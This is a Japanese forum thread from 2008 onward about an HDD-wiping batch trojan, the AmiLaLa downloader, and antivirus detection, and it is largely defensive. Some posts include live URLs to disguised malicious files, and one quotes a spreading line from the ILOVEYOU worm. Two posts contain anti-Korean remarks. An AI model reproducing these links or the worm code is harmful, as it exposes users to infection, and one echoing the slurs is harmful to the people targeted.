729名無しさん@お腹いっぱい。:2008/01/25(金) 16:54:26
>>725
そこにフォーマットされるウィルスを入れるとどんなウィルスなのかわからないので
最強なんじゃない?
730名無しさん@お腹いっぱい。:2008/01/25(金) 23:14:33
『朝日新聞2』008年1月25日朝刊2面
「感染を防ぐ「4ヵ条」」より

(略)
> 万が一、感染した場合は「パソコンを初期化して基本ソフトの段階から
> 入れ直したほうが安全だ」と武田教授は話す。
731名無しさん@お腹いっぱい。:2008/01/25(金) 23:24:06
>>723
バカがまた一人この世から浄化出来てよかったな
732名無しさん@お腹いっぱい。:2008/01/25(金) 23:27:10
でも、罰は軽いんだろうな…。
本当に日本は犯罪者に優しい気がするよ。
某国みたいに200年位求刑しとけっつーの。
733名無しさん@お腹いっぱい。:2008/01/26(土) 04:31:42
著作権法ですよ。よーするに別件。
そんなことがまかり通ることのほうがよーっぽど問題
734名無しさん@お腹いっぱい。:2008/01/26(土) 04:38:30
735名無しさん@お腹いっぱい。:2008/01/26(土) 08:19:48
>>734のtane_ulip踏んだらNOD32が反応した。
ってやっとパターン更新されたのかorz遅すぎるだろ常識的に考えて。
モジュール 対象 名前 ウイルス アクション ユーザ システム情報
IMON ファイル http://www5.uploader.jp/user/tane/images/tane_uljp00237.jpg ウイルスの可能性 : SCRIPT ウイルス
736735:2008/01/26(土) 08:21:13
しまった、ログそのままコピペしたからURLが残ってるorz

いつもの拡張子偽装のファイルです。危険ですので踏まないで下さい。
737名無しさん@お腹いっぱい。:2008/01/26(土) 08:46:58
いやああああああああ
738名無しさん@お腹いっぱい。:2008/01/26(土) 09:55:51
>>735
さっき他板で踏んだけど、カスペがトロイの木馬ッスよwwって教えてくれた
739名無しさん@お腹いっぱい。:2008/01/26(土) 10:20:21
あぶない、あぶない。
740名無しさん@お腹いっぱい。:2008/01/26(土) 12:18:35
>>734
「電源切っても無意味だと言うことを知れw」

こんな優しさのあるメッセージを残してくれる奴だから
心底、悪い奴でもなさそうだな、中辻ってw
741名無しさん@お腹いっぱい。:2008/01/26(土) 12:23:18
>>730 クリーンインストールが最善とはorz
負担掛かりますよね
742名無しさん@お腹いっぱい。:2008/01/26(土) 12:34:06
武田教授もズバリ言ってあげればいいのに。PC買いなおせって。
ウイルス製作者の真意の程は解らないのだからさ。
743名無しさん@お腹いっぱい。:2008/01/26(土) 12:36:01
>>741
外部への接続はVMwareの仮想マシンを使うんだよ。
VMwareの仮想マシンは定期的にスナップショットをとっておいて、
何か発見されたら、なにも出てこないポイントまでクリック一つでさかのぼれる。
744名無しさん@お腹いっぱい。:2008/01/26(土) 12:42:48
>>743
危険な発言だな・・・
745名無しさん@お腹いっぱい。:2008/01/26(土) 12:51:37
質問ですが、危険な発想の人はこの板の番頭さんですか?
746未冬:2008/01/26(土) 13:03:37
             /:::,. -/, -'―::ニニ`=ー- .._
           /:::/:::://:::::/::::::::::, -‐''´::>、`ヽ
             /:::/::::::/:::::/::::::::::/:::::::::/::::::::::',::::ヽ
         /:::/::::::/ヽ::::/:::::::::/:::://:::::::!:::::::|:',:::::ヽ
           !::::i::::::/、:::::Y:::::::::/:::::::/::/::::::::::::|::::::::|:::!:',::::',
         |:::::!:::::l::'、\!::::::::/::::::/::/:::::::::::::/:::::::/:::!!::',::::',
         !::::|::::::|::::ヽ::!::::::/:/::/::/::::::::::::;ィ:/::::/::::ハ::',::::!
           |:::|:|::::::!ヽ:::::|::::::|::!::ィ:,イ:::;::::///::::/!:/   !!:!::|
           !:::!::!::::::',::, -|::::::!:|/ リ∠ヱ_ノ/::/ ソ-― l!::!::! 
        |:::|:::!::l::::`i `゙!:::::|:! ヘ:゙ー'ノ `;/   rイ:ク''ゝ!:!/  
        !:::|:::|::!::::::::'、く!::::ヾ ` ̄ ̄     i` ̄´/:/    グダグダだな
         !:::|::::!:|:::::::::::ヽ|:::::|ヽ、           丶 /イ      
          |:::|::::|:|!::::::::::::::|!:::::!          / ,イ:::|
          !:::l!:::|:|',:::::::::::::|',:::::ト、      -‐-‐ / |:::::!
          !:::!!:::',:!:ヽ:::::::::! ',::::! 丶、      /  |:::::|
          |:::||:::::',:::::ヽ:_/__ ',:::!   `丶 /    |::::::!
        !::! !:::,∠´---- 、',::ト、    /      !:::::|
        |::! Y``丶、 ̄ ̄`:',:ト、\ /、、      |:::::!
           !:! ,!: : : : : : \ : : :',:! \\ヽヽ、     !::::!
        ,ヾ'-- 、 : : : : : \: :',:! : : \ヾ ',:\   |::::!
         /: : : : : : \ : : : : : ヽ',:| : : : :ヽヽト、: ヽ  !::|
       /: : : : : : : : : ヽ: : : : : : :',:! : : : : :ヽヽ',ヽ:ヽ !:|
      / : : : : : : : : : : : : ヽ: : : : : :',:!ヽ: : : : : ヾ',ヽヽ:|::!
747743:2008/01/26(土) 14:03:40
CD-ROMからブートするOSに感染しても、次回起動時にはきれいさっぱりなくなっている。
だから、まず、本体をCDブートし、HDDに格納された仮想マシンを日常は使う。
外部へのアクセスは、それぞれ専用の仮想マシンを使う。
あらかじめ危険と分かっているサイトへのアクセスは、
CDブートした仮想マシンを使うことで何の破壊活動もできなくすることが出来る。

と思う。
748名無しさん@お腹いっぱい。:2008/01/26(土) 16:02:42
>>735
おや?
いつの間にかマカも対応してて隔離された
749名無しさん@お腹いっぱい。:2008/01/26(土) 16:08:13
あぁ、これはだいぶ昔の奴なのか
750名無しさん@お腹いっぱい。:2008/01/27(日) 12:13:15
大手ウイルスソフト会社が追いつかないウイルス対策を個人の利用者が、
ウイルスの情報をソフト会社に提供すると、ソフト会社が駆除可否を確認した上で、
ウイルス情報を個人から買い取るという新たなサービスを実施する会社が現れた。

この活気的なアイデアを考案した会社はハッドラーソフト株式会社
HadodoraiBugado:http://hadodoraibugado.com/soshi/index.php?
この会社はウイルスの情報により100ドル〜10000ドルで買い取っているという。
751名無しさん@お腹いっぱい。:2008/01/27(日) 14:11:10
つまりウィルスは商材。
今後はウイルス情報を買い取らせるために、どんどん開発しろということですね?
昔から言われてるように、ウィルスはソフト会社が間接的に(ry
752名無しさん@お腹いっぱい。:2008/01/27(日) 21:05:18
753名無しさん@お腹いっぱい。:2008/01/30(水) 09:06:08
仮想マシンでウイルスを完全に防げるの?
754名無しさん@お腹いっぱい。:2008/01/30(水) 09:44:48
マイナー・B級・田舎ウィルスのとあるテスト結果

ttp://winnow.oitc.com/MalwarePerformanceGraphic.php?chart=detectionrate&size=20

ttp://virusinfo.info/images/vttesting/december_sum.PNG

一つの具体例:HDDをフォーマットするブラクラ
ttp://www13.atwiki.jp/burakura_hdd/pages/12.html
755名無しさん@お腹いっぱい。:2008/01/30(水) 13:20:47
>>753
防げるわけないだろw
汚染されてもすぐ復旧できるっていうだけ
756名無しさん@お腹いっぱい。:2008/01/31(木) 20:08:28
NOD32がどれかに対応したっぽい
2837(20080130)でprobably a variant of JS/TrojanDownloader.Agentと検出されます
ほんと今更だけど報告だけ
757名無しさん@お腹いっぱい。:2008/02/03(日) 14:26:07
>>735
ノートン2008でなんか警告かなんか出たけど、
一瞬、DL画面のプログレスバーが見えたのが気になるwwww

オレ大丈夫なの;;; batは無いし。フツーのautoexecも書き換えられてないし・・
レジストリのrunにもなんもないし。よーし再起動してくるwww
758名無しさん@お腹いっぱい。:2008/02/03(日) 14:35:52
全然普通に生還www
759名無しさん@お腹いっぱい。:2008/02/03(日) 19:25:41
>756
ttp://pc11.2ch.net/test/read.cgi/sec/1198165180/543-550

怒ってる人がいたけど、今さら対応されても、ってところかなw
やらないよりはマシだろうけど。
760名無しさん@お腹いっぱい。:2008/02/03(日) 21:42:30
HDDフォーマットのウイルス自体はありきたりな2〜3年前のウイルスなのでNODでもハナから対応できますよ

問題はダウンローダーの対応が糞遅かった
761名無しさん@お腹いっぱい。:2008/02/03(日) 23:13:08
HDDフォーマットはウィルスでもなんでもない
タダのbatファイルだし
762名無しさん@お腹いっぱい。:2008/02/04(月) 15:22:16
結局この騒ぎってなんだったん?
763名無しさん@お腹いっぱい。:2008/02/04(月) 17:53:39
フォーマットされた奴が入れてたアンチウイルスソフトが知りたいな
764名無しさん@お腹いっぱい。:2008/02/04(月) 18:44:29
30日の深夜に出たという話だったから
年末の段階で対応できてなかったソフトじゃないか?
今はもう殆どのベンダーが対応してるよ。
765名無しさん@お腹いっぱい。:2008/02/04(月) 21:12:17
>>764
まとめとかで問題にしてるのはダウンローダーのだけでしょ

フォーマットまでされたってのはよっぽどのソフトだろう
766名無しさん@お腹いっぱい。:2008/02/06(水) 16:42:39
つーかなんでこんな懐かしいブツを、今更わざわざほじくりかえしきたんだか謎。
767名無しさん@お腹いっぱい。:2008/02/06(水) 23:15:06
>>766
アンチウイルスで駆除できる在り来たりなウイルスを踏ませて
セキュリティソフトを導入させようとするPC安全協会wの仕業だろ

PC安全協会会員の中にもソフトの導入や買わせるなどの活動とは別に
無差別に他人のPCを壊滅させることに喜びを感じる
キチガイが存在するから警戒がいるな
768名無しさん@お腹いっぱい。:2008/02/11(月) 15:17:49
>30日の深夜に出た
っていつの30日よw
これヤフージャパンのプロフで使われてたの2004年の話よ?
その後の数年間ずっと未対応だったとしたら、相当の糞ベンダーどもだよ
769名無しさん@お腹いっぱい。:2008/02/13(水) 16:41:26
>>768
一応報道じゃあ2007年の12月30日となってるみたいだが。。。。
>2004年の話
それってフォーマットするDATの話?
それともDownloaderのこと?
記事ではDownloaderの事言ってるみたいだけど、
スレと読み合わせると良くわからんのよね。
770名無しさん@お腹いっぱい。:2008/02/14(木) 00:40:07
▼ 1. 2004年3月時点での AmiLaLa 情報記事
http://gunkanmaki.jog.buttobi.net/MiniReport20040313.html

▼ 2. 2005年1月時点での AmiLaLa 情報記事(文字化け時:エンコードは Shift-JIS)
http://web.archive.org/web/www1.bbweb-arena.com/lefty/blog258_017905.htm

AmiLaLa が各板の鑑定スレに依頼が出され始めたのが、2004年の1月くらいです。

当時ヤフープロフィールにはスクリプトを仕込むことができたので、
今回とほぼ同内容(引数やファイル名などが異なる)のバッチファイルのダウンロード、
またはADODB や MDAC などを利用したローカルファイルの削除・上書き・作成、
また同時に Cookie 値を渡しながらのブラクラへの転送などが行われていました。

Downloader を仮に AmiLaLa 本体(機能はバッチファイルのダウンロードに限らない)
を呼んだり誘導したりするものとすれば、上記リンクを見ればわかるように、
2004年当時から多種の URL で存在し、それらはみなすぐに消えてます。

昨年12月には30日以前にも多種の URL で鑑定依頼が出され、
上記のように前月11月にも出されてます(これらのファイル群はおそらくすべて消滅)。

従って同様にすぐに消えた「1230.jpg」だけが特別視された理由がわかりません。
(ちなみに AmiLaLa を呼ぶものは画像に限らず、リンク記事にもあるように
html、mhml、xml、exe、swf 形式などもあります。)
771名無しさん@お腹いっぱい。:2008/02/14(木) 00:41:36
http://pc11.2ch.net/test/read.cgi/sec/1162884659/962
> 962 :名無しさん@お腹いっぱい。:2007/12/10(月) 18:18:12
(〜略〜)
> 5.その後、バッチファイルをダウンロードを促される
> ttp://up2.viploader.net/pic2/src/viploaderf120001.jpg
> いきなりスタートアップフォルダ指定ですか
>
> ちなみにバッチファイルは実行するとHDDが全部まっさらになる
------------------------------
http://pc11.2ch.net/test/read.cgi/pcqa/1192793132/489
> 489 :|A`)ヅウ ◆.vDUUxqvlE :2007/11/21(水) 09:31:54 ID:aIn73kcY
(〜略〜)
> 2 アミララ関係のURLが開き、その後、別ページに飛ばされ延々読み込みが続きます
>   表示窓をクリックすると小窓が多数開き叫び声が再生され
>   メーラーが起動させられたので強制的に閉じました
>   そこまでウイルス反応なしですが
>   PC有害
772名無しさん@お腹いっぱい。:2008/02/14(木) 03:13:13
>>770-771
超thx
773名無しさん@お腹いっぱい。:2008/02/19(火) 00:55:54
h ttp ://up2.viploader.net/pic/src/viploader582987.jpg


これウィルスらしいだがそうなん?
俺の環境(jane)だとブサイクが表示されただけなんだが。。
774名無しさん@お腹いっぱい。:2008/02/25(月) 09:48:08
775名無しさん@お腹いっぱい。:2008/02/28(木) 04:49:08
なにかおかしいと思ったら再起動するんじゃなくてスタートアップを確認するべきだな
776名無しさん@お腹いっぱい。:2008/03/08(土) 18:37:25
質問です。
今さっき、「gigigi.net」でググったら、レディース(女の暴走族)の画像が
バンとで出てきました。
5秒後位に画面閉じたんですが、大丈夫ですか?
777名無しさん@お腹いっぱい。:2008/03/09(日) 03:59:21

    777 
合体
778名無しさん@お腹いっぱい。:2008/03/24(月) 22:11:26
>>20で紹介されてるwikiの左側にある
「有用と思われる書き込み」ってとこクリックすると、
NODが「BAT/DeltreeY.AN トロイの木馬」ってのを検出&隔離して
接続切断するんだけど・・・

wikiにウイルスがあるってこと??
779名無しさん@お腹いっぱい。:2008/03/24(月) 22:21:36
age
780名無しさん@お腹いっぱい。:2008/04/24(木) 04:57:33
s
781名無しさん@お腹いっぱい。:2008/04/25(金) 10:12:39
このスレで画像はりつけんなwww怖くてふめねーよ
782名無しさん@お腹いっぱい。:2008/04/30(水) 04:06:34
このパソコンアンチウイルス入ってないけど問題ない
783名無しさん@お腹いっぱい。:2008/08/02(土) 15:50:54
┌─────┐┌─────┐┌─────┐┌─────┐┌─────┐
..|   全力   |....|   レイ    |....|.   プ   ...|....|     だ!.   |....|  桐生一  |
└∩───∩┘└∩───∩┘└∩───∩┘└∩───∩┘└∩───∩┘
  ヽ( `・ω・.)ノ    ヽ(`・ω・´)ノ    ヽ(`・ω・´)ノ    ヽ(`・ω・´)ノ    ヽ(・ω・´ )ノ
784名無しさん@お腹いっぱい。:2008/08/07(木) 13:44:04
セキュ板でAmilalaも知らなかったやつがいる痛いスレ
785名無しさん@お腹いっぱい。:2008/09/04(木) 13:33:39
【国内】7100万円の脱税で猶予判決、朝鮮総連の傘下団体の職員ら・・・京都地裁[08/27]
http://news24.2ch.net/test/read.cgi/news4plus/1220118459/
786名無しさん@お腹いっぱい。:2009/01/01(木) 07:20:53
2009年初頭はこうゆうウイルス出回ってんの?
787名無しさん@お腹いっぱい。:2009/02/07(土) 21:15:06
あ?どう?
788名無しさん@お腹いっぱい。:2009/04/01(水) 17:27:26
「毎日新聞とってください」と勧誘員がきた
「うちは成りすまし朝鮮人じゃない」と言って追っ払った
反日変態新聞なんか読むのは朝鮮人と大差ない
789名無しさん@お腹いっぱい。:2009/08/04(火) 21:31:00
790名無しさん@お腹いっぱい。:2011/01/09(日) 20:24:06
Scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
791名無しさん@お腹いっぱい。:2012/12/06(木) 18:12:25.69
?
792名無しさん@お腹いっぱい。
このスレ懐かしいな